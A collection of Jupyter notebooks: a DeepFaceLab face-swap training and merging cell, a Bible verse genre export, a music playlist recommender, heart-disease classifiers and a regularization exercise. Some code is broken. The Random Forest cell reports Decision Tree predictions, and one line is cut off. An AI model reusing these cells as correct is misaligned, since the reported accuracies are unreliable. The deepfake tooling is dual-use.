print("Time to backup: "+str(round((39600-uptime)/3600))+" hours")
backup_time = str(round(39600-uptime))
backup_cmd = " --execute-program "+backup_time+" \"import os; os.system('zip -0 -r -q workspace.zip workspace'); os.system('cp /content/workspace.zip /content/drive/My\ Drive/'); print('Backed up!') \""
else:
print("Session expires in less than an hour.")
backup_cmd = ""
cmd = "DeepFaceLab/main.py train --training-data-src-dir workspace/data_src/aligned --training-data-dst-dir workspace/data_dst/aligned --pretraining-data-dir pretrain --model-dir workspace/model --model "+Model
if Model == "Quick96":
cmd+= " --pretrained-model-dir pretrain_Q96"
if Silent_Start:
cmd+= " --silent-start"
if (backup_cmd != ""):
train_cmd = (cmd+backup_cmd)
else:
train_cmd = (cmd)
!python $train_cmd
```
## Merge frames
```
#@title Merge
Model = "SAEHD" #@param ["SAEHD", "AMP", "Quick96" ]
cmd = "DeepFaceLab/main.py merge --input-dir workspace/data_dst --output-dir workspace/data_dst/merged --output-mask-dir workspace/data_dst/merged_mask --aligned-dir workspace/data_dst/aligned --model-dir workspace/model --model "+Model
%cd "/content"
!python $cmd
#@title Get result video
Mode = "result video" #@param ["result video", "result_mask video"]
Copy_to_Drive = True #@param {type:"boolean"}
if Mode == "result video":
!python DeepFaceLab/main.py videoed video-from-sequence --input-dir workspace/data_dst/merged --output-file workspace/result.mp4 --reference-file workspace/data_dst.mp4 --include-audio
if Copy_to_Drive:
!cp /content/workspace/result.mp4 /content/drive/My\ Drive/
elif Mode == "result_mask video":
!python DeepFaceLab/main.py videoed video-from-sequence --input-dir workspace/data_dst/merged_mask --output-file workspace/result_mask.mp4 --reference-file workspace/data_dst.mp4
if Copy_to_Drive:
!cp /content/workspace/result_mask.mp4 /content/drive/My\ Drive/
```
|
github_jupyter
|
# Convert verse ranges of genres to TF verse node features
```
import collections
import pandas as pd
from tf.fabric import Fabric
from tf.compose import modify
from tf.app import use
A = use('bhsa', hoist=globals())
genre_ranges = pd.read_csv('genre_ranges.csv')
genre_ranges
```
# Compile data & sanity checks
```
# check book values
genre_ranges.book.unique()
# check genre values
genre_ranges.genre.unique()
# check book name alignment with BHSA english names
for book in genre_ranges.book.unique():
bhsa_node = T.nodeFromSection((book,))
if not bhsa_node:
raise Exception(book)
def verse_node_range(start, end, tf_api):
"""Generate a list of verse nodes for a given range of reference tuples.
Note that start and end are both inclusive bounds.
Args:
start: 3-tuple of (book, n_ch, n_vs)
end: 3-tuple of (book, n_ch, n_vs)
Returns:
list of nodes
"""
start_node = tf_api.T.nodeFromSection(start)
end_node = tf_api.T.nodeFromSection(end)
nodes = [start_node]
while nodes[-1] < end_node:
nodes.append(tf_api.L.n(nodes[-1],'verse')[0])
return nodes
# check for missing verses
# or double-counted verses
verse2genre = {} # will be used for TF export
verse2count = collections.Counter()
for book, startch, startvs, endch, endvs, genre in genre_ranges.values:
start = (book, startch, startvs)
end = (book, endch, endvs)
for verse in verse_node_range(start, end, A.api):
verse2genre[verse] = genre
verse2count[verse] += 1
# check for double-labeled verses
for verse,count in verse2count.items():
if count > 1:
print(verse, T.sectionFromNode(verse))
# check for missing verses
all_verses = set(F.otype.s('verse'))
for missing_verse in (all_verses - set(verse2genre.keys())):
print(missing_verse, T.sectionFromNode(missing_verse))
#verse2genre
```
# Export TF Features
```
nodeFeatures = {'genre': verse2genre}
featureMeta = {
'genre': {
'description': '(sub)genre of a verse node',
'authors': 'Dirk Bakker, Marianne Kaajan, Martijn Naaijer, Wido van Peursen, Janet Dyk',
'origin': 'the genre feature was tagged during the NWO-funded syntactic variation project (2013-2018) of the ETCBC, VU Amsterdam',
'source_URL': 'https://github.com/MartijnNaaijer/phdthesis/blob/master/Various/subgenres_synvar.xls',
'valueType': 'str',
}
}
TF = Fabric('tf/c')
TF.save(nodeFeatures=nodeFeatures, metaData=featureMeta)
```
## Tests
```
TF = Fabric(locations=['~/github/etcbc/bhsa/tf/c', 'tf/c'])
API = TF.load('genre')
API.makeAvailableIn(globals())
F.otype.s('verse')
verse_data = []
for verse_n in F.otype.s('verse'):
genre = F.genre.v(verse_n)
book, chapter, verse = T.sectionFromNode(verse_n)
ref = f'{book} {chapter}:{verse}'
verse_data.append({
'node': verse_n,
'ref': ref,
'book': book,
'genre': genre,
'text': T.text(verse_n),
})
verse_df = pd.DataFrame(verse_data)
verse_df.set_index('node', inplace=True)
verse_df.head()
# save a .csv copy
verse_df[['ref', 'genre']].to_csv('verse2genre.csv', index=False)
verse_df.genre.value_counts()
verse_df[verse_df.genre == 'prophetic'].book.value_counts()
verse_df[verse_df.genre == 'list'].book.value_counts()
# How many verses per book are a given genre?
book2genre = pd.pivot_table(
verse_df,
index='book',
columns=['genre'],
aggfunc='size',
fill_value=0,
)
book2genre
# get percentages
book2genre.div(book2genre.sum(1), 0)
```
|
github_jupyter
|
```
#---------
# Recommend System in NetEase
#
# Modify History : 2019 - Jan - 22
# Platform: Win7 + Python2
#---------
```
### 1 从原始文件中抽取期望的歌单数据
```
#coding:urf-8
import json
import sys
# 从Json文件中提取特定格式的文本数据 #
# 返回的文本格式:歌曲名字##歌曲标签##歌单ID##歌曲收藏数目 歌曲信息
def parse_song_inline(in_line):
loaded_data = json.loads(in_line)
name = loaded_data['result']['name'] # 名字
tags = ",".join(loaded_data['result']['tags'])# 标签
subscribed_count = loaded_data['result']['subscribedCount'] # 收藏数目
if subscribed_count <= 100:
#print "subscribed_count is less than 100, please check data ..."
return False
playlist_id = loaded_data['result']['id'] # 歌单ID
tracks = loaded_data['result']['tracks'] # "tracks": [{歌曲1},{歌曲2}, ...]
song_inforcontent = ''
for track in tracks:
try: # 歌曲信息中包含: => 歌单ID:::歌曲名字:::歌手名字:::歌曲流行度
song_inforcontent += "\t" + ":::".join([str(track['id']),track['name'],track['artists'][0]['name'],str(track['popularity'])])
except Exception,e:
print "Exception information 1",e
print track
continue
# 获取如下格式的文本信息
# 格式:歌曲名字##歌曲标签##歌单ID##歌曲收藏数目 歌曲信息
GotText = name+"##"+tags+"##"+str(playlist_id)+'##'+str(subscribed_count)+song_inforcontent
return GotText
# 将抽取的文本写入特定的text文件
def parse_files(input_file,out_file):
outdata = open(out_file,'w')
for line in open(input_file):
GotText = parse_song_inline(line)
if GotText:
outdata.write(GotText.encode('utf-8').strip()+"\n")
outdata.close()
%time parse_files("./RawData/playlistdetail.all.json","./InternalData/1_music_playlist_info.txt")
```
### 2 将歌单数据处理成适用于推荐系统的数据格式
```
import surprise
import lightfm
# project = offline modeleing + oneline prediction
# 推荐机制:
# 1.针对用户推荐,每日推荐7 - 30首歌曲
# 2.针对你听到的歌曲,推荐类似的歌曲
# 3.针对你喜欢的歌手,推荐类似的歌手给用户
#coding:utf-8
#为适应于surprise模型,将数据解析成userid itemid rating timestamp 行格式
import json
import sys
# check is null or not
def is_null(s):
return len(s.split(","))>2
def parse_song_inforcontent(song_inforcontent):
try:
song_id,name,artist,popularity = song_inforcontent.split(":::")
return ",".join([song_id,"1.0",'1300000'])
#return ",".join([song_id, name, artist, popularity])
except Exception,e:
#print "Exception information 2 ",e
#print song_inforcontent
return " "
def parse_playlist_inline(in_line):
try:
contents = in_line.strip().split("\t") # strip 取出字符串首尾字符,默认是取出空格
name,tags,playlist_id,subscribed_count = contents[0].split("##")
songs_infor = map(lambda x: playlist_id +","+ parse_song_inforcontent(x),contents[1:])
# filter (function,iterable): 将iterable 作用于function逐个判断,将满足条件的iterable 返回新list
songs_information = filter(is_null,songs_infor)
return "\n".join(songs_information)
except Exception,e:
#print "Exception information 3 ",e
return False
# 将抽取的文本写入特定的text文件
def parse_files(input_file,out_file):
outdata = open(out_file,'w')
for line in open(input_file):
GotText = parse_playlist_inline(line)
if GotText:
outdata.write(GotText.encode('utf-8').strip()+"\n")
outdata.close()
%time parse_files("./InternalData/1_music_playlist_info.txt","./InternalData/2_music_playlist_surpriseformat.txt")
```
### 处理流行歌单
```
%time parse_files("./RawData/popular.playlist","./InternalData/3_music_popularplaylist_surpriseformat.txt")
```
### 3 保存歌曲以及歌单信息以备后面的建模使用
需要保存歌单ID => 歌单名字,以及歌曲ID =>歌曲名字 的信息以备用
```
#coding:utf-8
import cPickle as pickle
import sys
def parse_playlist_get_infor(in_line,playlist_dic,song_dic):
contents = in_line.strip().split("\t")
name,tags,playlist_id,subscribed_count = contents[0].split("##")
playlist_dic[playlist_id] = name
for song in contents[1:]:
try:
song_id,song_name,artist,popularity = song.split(":::")
song_dic[song_id] = song_name + "\t" + artist
except:
print "FormatError.."
print song + "\n"
def parse_file(in_file,out_playlist,out_song):
playlist_dic = {} # 歌单ID 到歌单的映射字典
song_dic = {} # 歌曲ID到歌曲名字的映射字典
for line in open(in_file):
parse_playlist_get_infor(line,playlist_dic,song_dic)
#通过pickle 序列化保存成二进制的文件
pickle.dump(playlist_dic,open(out_playlist,"wb"))
# 通过playlist_doc = pickle.load(open("playlist.pkl","rb")) 重新载入
pickle.dump(song_dic,open(out_song,"wb"))
%time parse_file("./InternalData/1_music_playlist_info.txt","./InternalData/4_playlist.pkl","./InternalData/5_song.pkl")
%time parse_file("./RawData/popular.playlist","./InternalData/6_popular_playlist.pkl","./InternalData/7_popular_song.pkl")
```
### 4 使用协同过滤建模并进行预测
#### 使用surprise 自带的movielens 数据集
```
from surprise import SVD,KNNWithMeans
from surprise import Dataset
from surprise import evaluate,print_perf
# load movielens datasets
data = Dataset.load_builtin('ml-100k')
# k折交叉验证
%time data.split(n_folds = 3)
# 试试SVD分解
%time algo = SVD()
print (algo)
# Evaluate the performance of the algorithm on given data
# return A dictionary containing measures as keys and lists as values. Each list contains one entry per fold
%time perf = evaluate(algo,data,measures=[u'rmse', u'mae'] )
%time print_perf(perf)
data.raw_ratings[0]
```
### 算法调参
### 这里实现的算法是SVD 等,一些超参数的选择也会最终影响后果。下面可以使用sklearn 中的网格搜索交叉验证来GridsearchCV来选择最终的参数
```
from surprise import GridSearch
from surprise import SVD # or KNNWithMeans also can be OK!
from surprise import Dataset
# Following parameters use can be understand by help(GridSearch)
algo_class = SVD # KNNWithMeans also can be OK!
param_grid = {'n_epochs':[5,10], 'lr_all':[0.002,0.005], 'reg_all':[0.4,0.6]}
measures = ['rmse', 'mae']
gridsearch = GridSearch(algo_class,param_grid,measures, n_jobs = -1 , verbose = True)
data = Dataset.load_builtin('ml-100k')
data.split(n_folds = 4)
gridsearch.evaluate(data)
```
### 用户216 对电影11的打分是5.0分,时间是880234346
```
data.raw_ratings[1] # user, item, rating, timestamp
```
### 输出模型评价
```
gridsearch.best_score
gridsearch.best_score['rmse']
gridsearch.best_estimator
gridsearch.best_params
gridsearch.best_params['mae']
gridsearch.best_params['rmse']
gridsearch.best_score
gridsearch.best_index
gridsearch.cv_results
help(GridSearch)
```
## 协同过滤建模后,根据一个items寻找相似度最高的item,使用algo.get_neighbors 函数
```
### 先认识一下处理的数据 特征
### in C:\Users\Yazhou\.surprise_data\ml-100k\ml-100k\u/item
import io
import os
file_name = (os.path.expanduser('~') + '/.surprise_data/ml-100k/ml-100k/u.item')
with io.open(file_name,'r',encoding = 'ISO-8859-1') as f:
for line in f:
#print ">>>Output: ",line
pass
```
### 1. 针对自带的Movielens 数据集做推荐
```
from __future__ import (absolute_import,division,print_function,unicode_literals)
import os
import io
from surprise import Dataset
from surprise import KNNBasic # or KNNBaseline
file_name = (os.path.expanduser('~') + '/.surprise_data/ml-100k/ml-100k/u.item')
def read_item_names():
"获取电影ID到电影名字,电影名字到电影ID的映射关系"
rid_to_name = {}
name_to_rid = {}
with io.open(file_name,'r',encoding = 'ISO-8859-1') as f: # "ISO-8859-1" 是官方指定的字体
for line in f:
line = line.split('|') # 从上面的数据格式可以看出原始数据是ID|Name 的先后顺序
#print("line is:",line)
rid_to_name[line[0]] = line[1] # 字典,line[0] is key, line[1] is value # 数据在dict中的位置并不是line[0]
name_to_rid[line[1]] = line[0] # 字典, line[1] is key, line[0] is value,
#print ("line[0] is ", line[0])
#print ("line[1] is ", line[1])
#print (">>> rid_to_name is",rid_to_name)
#print ("<<< name_to_rid is",name_to_rid)
return rid_to_name,name_to_rid
"利用算法来计算item之间的相似度"
data = Dataset.load_builtin('ml-100k')
import random
my_seed = 200
random.seed(my_seed)
trainset = data.build_full_trainset()
# data.split(n_folds = 4,shuffle = True) # Split the dataset into folds for future cross-validation from help(data)
sim_options = {'name':'pearson_baseline','user_based':False,'verbose':True}
# 基于用户的协同过滤
algo = KNNBasic(sim_options = sim_options)
algo.fit(trainset)
"下面的例子证明字典里面的数据:'This is one new movies' 并没有出现在第3的位置"
dict1 = {u'1': u'Toy Story (1995)', u'2': u'GoldenEye (1995)'}
dict1[3] = 'This is one new movies'
dict1
"计算pearson_baseline相似矩阵"
similarity_matrix = algo.compute_similarities()
"获取电影ID到电影名字,电影名字到电影ID的数据映射关系"
rid_to_name,name_to_rid = read_item_names()
"rid_to_name 数据:电影ID到电影名字的映射字典"
rid_to_name
"name_to_rid 数据:电影名字到电影ID的映射字典"
name_to_rid
"原始电影ID到 inner id 的转化过程: 转化来着模型的数据需要"
raw_movie_id = name_to_rid['Bye Bye, Love (1995)'] # Toy Story (1995) # Bye Bye, Love (1995)
#raw_movie_id => 1446 raw movie id
iinder_movie_id = algo.trainset.to_inner_iid(raw_movie_id)
#iinder_movie_id => 1217 inner movie id for using in model
"通过get_neighbors 来计算inner id: iid = 1217 的最近/最相似的k个相似"
iid = iinder_movie_id
k = 12
"找到的距离目标最近的几个item,返回的inner id:iid" "to_raw_iid/to_inner_iid 都是针对item的id转换"
kneighbors_iid = algo.get_neighbors(iid, k) # Returns:The list of the ``k`` (inner) ids of the closest users (or items)to ``iid``
"将inner id:iid 转换成原始id:rawid"
kneighbors_rawid = (algo.trainset.to_raw_iid(k_iid) for k_iid in kneighbors_iid) # 返回生成器
"依照原始id:rawid 找到对应的电影名字"
movie_withrawid = [rid_to_name[k_rawid] for k_rawid in kneighbors_rawid] # 也可以是生成器,但是写成了list了
"打印输出跟目标最相似的几个电影名字"
#for movie in movie_withrawid:
# print ("找到跟目标电影最相似的k(k = 12)个电影分别是:",movie)
for kth in range(0,k):
print ("找到跟目标电影最相似的第 %d 电影是: %s" %(1 + kth,movie_withrawid[kth]))
```
### 2.使用音乐数据预测
```
from __future__ import (absolute_import, division, print_function,unicode_literals)
import os
import io
from surprise import KNNBaseline,Reader,KNNBasic,KNNWithMeans
from surprise import Dataset
import cPickle as pickle
"重建流行歌单ID到歌单名字的映射关系"
playlistid_to_name = {}
playlistid_to_name = pickle.load(open("./InternalData/6_popular_playlist.pkl", 'rb'))
print("重建流行歌单ID到歌单名字的映射关系 完成....")
"重建歌单名到歌单ID的映射关系"
playlistname_to_id = {}
for playlist_id in playlistid_to_name:
playlistname_to_id[playlistid_to_name[playlist_id]] = playlist_id
print("重建流行歌单名到歌单ID的映射关系 完成....")
file_path = os.path.expanduser("./InternalData/3_music_popularplaylist_surpriseformat.txt")
"指定文件格式..."
reader = Reader(line_format = "user item rating timestamp",sep = ',')
"载入指定的数据集"
loaded_musicdata = Dataset.load_from_file(file_path = file_path, reader = reader)
"计算歌曲之间的相识度"
music_full_trainset = loaded_musicdata.build_full_trainset()
print("构建数据集合完成。。。")
"歌单ID到歌单的映射关系,存放在这样一个字典中"
#playlistid_to_name.keys()
#playlistid_to_name.values()
print (playlistid_to_name[playlistid_to_name.keys()[2] ])
"music 基本数据特征"
music_full_trainset.n_users
#music_full_trainset.n_items
#music_full_trainset.rating_scale
#music_full_trainset.global_mean
```
### 2.1下面是针对歌单的个性推荐
```
"开始训练模型 - 找到相似的歌单(默认一个用户只建立一个歌单playlist)"
algo = KNNBaseline() # "默认是用户base 的KNN"
algo.train(music_full_trainset)
"目标歌单名字"
target_playlistname = playlistname_to_id.keys()[39]
print ("目标歌单名字:",target_playlistname)
"目标歌单ID"
target_playlistid = playlistname_to_id[target_playlistname]
print ("目标歌单原始ID:",target_playlistid)
"将原始歌单ID转成inner id,用于get_neighbors 预测" ".to_inner_uid/to_raw_uid 都是针对user:uid的函数推荐"
target_playlistiid = algo.trainset.to_inner_uid(target_playlistid)
print ("目标歌单内部ID:",target_playlistiid)
k = 10
playlist_neignhbors_kid = algo.get_neighbors(target_playlistiid,k = k)
"将预测出的k个inner id 转成原始id:raw_id"
playlist_neignhbors_rid = [algo.trainset.to_raw_uid(innerid) for innerid in playlist_neignhbors_kid]
"有k 个原始id:raw_id 找到对应的歌单名字"
playlist_neignhbors_name = [playlistid_to_name[raw_uid] for raw_uid in playlist_neignhbors_rid]
"打印输出这k个电影名字:"
print("\n跟目标歌单<<",target_playlistname,">>相似的k个歌单分别是:" )
for raw_playlistname in playlist_neignhbors_name:
print (raw_playlistname,"对应的inner id是:",algo.trainset.to_inner_uid(playlistname_to_id[raw_playlistname]))
"针对歌曲个性推荐"
from __future__ import (absolute_import, division, print_function,unicode_literals)
import os
import io
from surprise import KNNBaseline,Reader,KNNBasic,KNNWithMeans
from surprise import Dataset
import cPickle as pickle
"重建流行歌曲ID到歌曲名字的映射关系"
songid_to_name = {}
songid_to_name = pickle.load(open("./InternalData/7_popular_song.pkl", 'rb'))
print ("歌曲ID到歌曲名字的映射...完成!")
"歌曲名字到歌曲ID的映射"
songname_to_id = {}
for song_id in songid_to_name:
songname_to_id[songid_to_name[song_id]]= song_id # 名字做key, id做value
print("歌曲名字到歌曲ID的映射....完成!")
file_path = os.path.expanduser("./InternalData/3_music_popularplaylist_surpriseformat.txt")
"指定文件格式..."
reader = Reader(line_format = "user item rating timestamp",sep = ',')
"载入指定的数据集"
loaded_songdata = Dataset.load_from_file(file_path = file_path, reader = reader)
song_full_trainset = loaded_songdata.build_full_trainset()
"模型"
algo = KNNWithMeans()
algo.train(song_full_trainset)
"目标歌曲名字"
target_songname = songname_to_id.keys()[98]
print("目标歌曲名字 是:",target_songname)
target_songid = songname_to_id[target_songname]
algo.train.to-
```
### 2.2 下面是针对歌曲的个性推荐
```
from __future__ import (absolute_import, division, print_function,unicode_literals)
import os
import io
from surprise import KNNBaseline,Reader,KNNBasic,KNNWithMeans
from surprise import Dataset
import cPickle as pickle
"重建流行歌曲ID到歌曲名字的映射关系"
songid_to_name = {}
songid_to_name = pickle.load(open("./InternalData/7_popular_song.pkl", 'rb'))
print ("歌曲ID到歌曲名字的映射...完成!")
"歌曲名字到歌曲ID的映射"
songname_to_id = {}
for song_id in songid_to_name:
songname_to_id[songid_to_name[song_id]]= song_id # 名字做key, id做value
print("歌曲名字到歌曲ID的映射....完成!")
"inner id = 4 的用户"
user_inner_id = 4
"ur(:obj:`defaultdict` of :obj:`list`): The users ratings. This is a \
dictionary containing lists of tuples of the form ``(item_inner_id,\
rating)``. The keys are user inner ids."
item_inner_id_andrating = music_full_trainset.ur[user_inner_id] # user_rating 返回的是:(item_inner_id,rating)
item_inner_id = map(lambda x:x[0], item_inner_id_andrating)
for item_iid in item_inner_id:
print (algo.predict(uid = user_inner_id,iid = item_iid,r_ui = None, clip = True,verbose=False),
songid_to_name[algo.trainset.to_raw_iid(item_iid)])
```
### 使用矩阵分解做预测
```
### 使用NMF
from surprise import NMF,evaluate
from surprise import Dataset
file_path = os.path.expanduser("./InternalData/3_music_popularplaylist_surpriseformat.txt")
"指定文件格式..."
reader = Reader(line_format = "user item rating timestamp",sep = ',')
"载入指定的数据集"
loaded_musicdata = Dataset.load_from_file(file_path = file_path, reader = reader)
"计算歌曲之间的相识度"
trainset = loaded_musicdata.build_full_trainset()
print("构建数据集合完成。。。")
"建模"
algo= NMF()
algo.train(trainset)
print ("建模完成。。。")
"指定 user inner id = 4"
user_inner_id = 4
item_inner_id_andrating = trainset.ur[user_inner_id] # user_rating 返回的是:(item_inner_id,rating)
item_inner_id = map(lambda x:x[0], item_inner_id_andrating)
"这里不同的是讲inner id全部转成 raw user and itme id 做predict "
for item_iid in item_inner_id:
print (algo.predict(uid = algo.trainset.to_raw_uid(user_inner_id),iid = algo.trainset.to_raw_iid(item_iid),r_ui = 1, clip = True,verbose=False),
songid_to_name[algo.trainset.to_raw_iid(item_iid)])
```
### 可以使用以下方法来存储和重新加载模型
```
import surprise
surprise.dump.dump("./InternalData/Recommendation.model",algo = algo) # save to local
"Reload Model Again"
reload_algo = surprise.dump.load("./InternalData/Recommendation.model")
```
### 不同推荐系统算法之间的差距评估
```
"首先载入数据Dataset"
from surprise import NMF,evaluate,NormalPredictor,BaselineOnly,KNNBasic,KNNWithMeans,KNNBaseline,SVD
from surprise import Dataset,Reader,SVDpp,SlopeOne,CoClustering
import os,io
file_path = os.path.expanduser("./InternalData/3_music_popularplaylist_surpriseformat.txt")
"指定文件格式..."
reader = Reader(line_format = "user item rating timestamp",sep = ',')
"载入指定的数据集"
loaded_musicdata = Dataset.load_from_file(file_path = file_path, reader = reader)
loaded_musicdata.split(n_folds = 5)
"Return a list of ratings (user, item, rating, timestamp) read from\ file_name"
#loaded_musicdata.read_ratings(file_path)
"Evaluate the performance of the algorithm on given data"
algo = NMF()
perf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse',u'mae'], with_dump=False, dump_dir=None, verbose=1)
print perf
"Evaluate the performance of the algorithm on given data"
algo = NormalPredictor()
perf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse',u'mae'], with_dump=False, dump_dir=None, verbose=1)
print perf
"Evaluate the performance of the algorithm on given data"
algo = BaselineOnly()
perf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse',u'mae'], with_dump=False, dump_dir=None, verbose=1)
print perf
"Evaluate the performance of the algorithm on given data"
algo = KNNBasic()
perf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse',u'mae'], with_dump=False, dump_dir=None, verbose=1)
print perf
"Evaluate the performance of the algorithm on given data"
algo = KNNWithMeans()
perf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse',u'mae'], with_dump=False, dump_dir=None, verbose=1)
print perf
"Evaluate the performance of the algorithm on given data"
algo = SVD()
perf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse',u'mae'], with_dump=False, dump_dir=None, verbose=1)
print perf
"Evaluate the performance of the algorithm on given data"
algo = SVDpp() # SVD++
perf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse','mae'], with_dump=False, dump_dir=None, verbose=1)
print perf
"Evaluate the performance of the algorithm on given data"
algo = CoClustering()
perf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse'], with_dump=False, dump_dir=None, verbose=1)
print (perf)
#help(data)
#help(algo)
#help(KNNBaseline)
#help(KNNWithMeans)
#help(Reader)
#help(Dataset)
#help(music_full_trainset)
#rid_to_name,name_to_rid = read_item_names()
#rid_to_name['344']
#name_to_rid.values()
#name_to_rid.keys()
#name_to_rid["To Cross the Rubicon (1991)"]
```
|
github_jupyter
|
## 1. Importing the required libraries for EDA
```
import pandas as pd
import numpy as np # For mathematical calculations
import seaborn as sns # For data visualization
import matplotlib.pyplot as plt # For plotting graphs
%matplotlib inline
sns.set(color_codes=True)
import warnings
warnings.filterwarnings("ignore")
# Scaling
from sklearn.preprocessing import RobustScaler
# Train Test Split
from sklearn.model_selection import train_test_split
# Models
from sklearn.svm import SVC
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import GradientBoostingClassifier
# Metrics
from sklearn.metrics import accuracy_score, classification_report
# Cross Validation
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import GridSearchCV
print('Packages imported...')
```
## Reading Data
```
data=pd.read_csv("heart.csv")
data.head()
data.info()
Q1 = data.quantile(0.25).loc['chol']
Q3 = data.quantile(0.75).loc['chol']
IQR = Q3 - Q1
print(IQR,data.shape)
data = data[~((data.chol < (Q1 - 1.5 * IQR)) | (data.chol > (Q3 + 1.5 * IQR)))]
data.shape
```
## Scaling and Encoding features
```
# define the columns to be encoded and scaled
cat_cols = ['sex','exng','caa','cp']
con_cols = ["age","trtbps","chol","thalachh"]
# creating a copy of data
df1 = data[cat_cols + con_cols]
# encoding the categorical columns
X = pd.get_dummies(df1, columns = cat_cols, drop_first = True)
# defining the features and target
y = data[['output']]
# instantiating the scaler
scaler = RobustScaler()
# scaling the continuous featuree
X[con_cols] = scaler.fit_transform(X[con_cols])
print("The first 5 rows of X are")
X.head()
# Train and test split
X_train, X_test, y_train, y_test = train_test_split(X,y, test_size = 0.2, random_state = 42)
print("The shape of X_train is ", X_train.shape)
print("The shape of X_test is ",X_test.shape)
print("The shape of y_train is ",y_train.shape)
print("The shape of y_test is ",y_test.shape)
```
## Modeling
### 1. Support Vector Machines
```
# instantiating the object and fitting
clf = SVC(kernel='linear', C=1, random_state=42).fit(X_train,y_train)
# predicting the values
y_pred = clf.predict(X_test)
# printing the test accuracy
print("The test accuracy score of SVM is ", accuracy_score(y_test, y_pred))
```
## Hyperparameter tuning of SVC
```
# instantiating the object
svm = SVC()
# setting a grid - not so extensive
parameters = {"C":np.arange(1,10,1),'gamma':[0.00001,0.00005, 0.0001,0.0005,0.001,0.005,0.01,0.05,0.1,0.5,1,5]}
# instantiating the GridSearchCV object
searcher = GridSearchCV(svm, parameters)
# fitting the object
searcher.fit(X_train, y_train)
# the scores
print("The best params are :", searcher.best_params_)
print("The best score is :", searcher.best_score_)
# predicting the values
y_pred = searcher.predict(X_test)
# printing the test accuracy
print("The test accuracy score of SVM after hyper-parameter tuning is ", accuracy_score(y_test, y_pred))
```
## Decision Tree
```
# instantiating the object
dt = DecisionTreeClassifier(random_state = 42)
# fitting the model
dt.fit(X_train, y_train)
# calculating the predictions
y_pred = dt.predict(X_test)
# printing the test accuracy
print("The test accuracy score of Decision Tree is ", accuracy_score(y_test, y_pred))
```
## Random Forest
```
# instantiating the object
rf = RandomForestClassifier()
# fitting the model
rf.fit(X_train, y_train)
# calculating the predictions
y_pred = dt.predict(X_test)
# printing the test accuracy
print("The test accuracy score of Random Forest is ", accuracy_score(y_test, y_pred))
```
## Gradient Boosting Classifier
```
# instantiate the classifier
gbt = GradientBoostingClassifier(n_estimators = 300,max_depth=5,subsample=0.8,max_features=0.2,random_state=42)
# fitting the model
gbt.fit(X_train,y_train)
# predicting values
y_pred = gbt.predict(X_test)
print("The test accuracy score of Gradient Boosting Classifier is ", accuracy_score(y_test, y_pred))
```
|
github_jupyter
|
# Regularization
Welcome to the second assignment of this week. Deep Learning models have so much flexibility and capacity that **overfitting can be a serious problem**, if the training dataset is not big enough. Sure it does well on the training set, but the learned network **doesn't generalize to new examples** that it has never seen!
**You will learn to:** Use regularization in your deep learning models.
Let's first import the packages you are going to use.
### <font color='darkblue'> Updates to Assignment <font>
#### If you were working on a previous version
* The current notebook filename is version "2a".
* You can find your work in the file directory as version "2".
* To see the file directory, click on the Coursera logo at the top left of the notebook.
#### List of Updates
* Clarified explanation of 'keep_prob' in the text description.
* Fixed a comment so that keep_prob and 1-keep_prob add up to 100%
* Updated print statements and 'expected output' for easier visual comparisons.
```
# import packages
import numpy as np
import matplotlib.pyplot as plt
from reg_utils import sigmoid, relu, plot_decision_boundary, initialize_parameters, load_2D_dataset, predict_dec
from reg_utils import compute_cost, predict, forward_propagation, backward_propagation, update_parameters
import sklearn
import sklearn.datasets
import scipy.io
from testCases import *
%matplotlib inline
plt.rcParams['figure.figsize'] = (7.0, 4.0) # set default size of plots
plt.rcParams['image.interpolation'] = 'nearest'
plt.rcParams['image.cmap'] = 'gray'
```
**Problem Statement**: You have just been hired as an AI expert by the French Football Corporation. They would like you to recommend positions where France's goal keeper should kick the ball so that the French team's players can then hit it with their head.
<img src="images/field_kiank.png" style="width:600px;height:350px;">
<caption><center> <u> **Figure 1** </u>: **Football field**<br> The goal keeper kicks the ball in the air, the players of each team are fighting to hit the ball with their head </center></caption>
They give you the following 2D dataset from France's past 10 games.
```
train_X, train_Y, test_X, test_Y = load_2D_dataset()
```
Each dot corresponds to a position on the football field where a football player has hit the ball with his/her head after the French goal keeper has shot the ball from the left side of the football field.
- If the dot is blue, it means the French player managed to hit the ball with his/her head
- If the dot is red, it means the other team's player hit the ball with their head
**Your goal**: Use a deep learning model to find the positions on the field where the goalkeeper should kick the ball.
**Analysis of the dataset**: This dataset is a little noisy, but it looks like a diagonal line separating the upper left half (blue) from the lower right half (red) would work well.
You will first try a non-regularized model. Then you'll learn how to regularize it and decide which model you will choose to solve the French Football Corporation's problem.
## 1 - Non-regularized model
You will use the following neural network (already implemented for you below). This model can be used:
- in *regularization mode* -- by setting the `lambd` input to a non-zero value. We use "`lambd`" instead of "`lambda`" because "`lambda`" is a reserved keyword in Python.
- in *dropout mode* -- by setting the `keep_prob` to a value less than one
You will first try the model without any regularization. Then, you will implement:
- *L2 regularization* -- functions: "`compute_cost_with_regularization()`" and "`backward_propagation_with_regularization()`"
- *Dropout* -- functions: "`forward_propagation_with_dropout()`" and "`backward_propagation_with_dropout()`"
In each part, you will run this model with the correct inputs so that it calls the functions you've implemented. Take a look at the code below to familiarize yourself with the model.
```
def model(X, Y, learning_rate = 0.3, num_iterations = 30000, print_cost = True, lambd = 0, keep_prob = 1):
"""
Implements a three-layer neural network: LINEAR->RELU->LINEAR->RELU->LINEAR->SIGMOID.
Arguments:
X -- input data, of shape (input size, number of examples)
Y -- true "label" vector (1 for blue dot / 0 for red dot), of shape (output size, number of examples)
learning_rate -- learning rate of the optimization
num_iterations -- number of iterations of the optimization loop
print_cost -- If True, print the cost every 10000 iterations
lambd -- regularization hyperparameter, scalar
keep_prob - probability of keeping a neuron active during drop-out, scalar.
Returns:
parameters -- parameters learned by the model. They can then be used to predict.
"""
grads = {}
costs = [] # to keep track of the cost
m = X.shape[1] # number of examples
layers_dims = [X.shape[0], 20, 3, 1]
# Initialize parameters dictionary.
parameters = initialize_parameters(layers_dims)
# Loop (gradient descent)
for i in range(0, num_iterations):
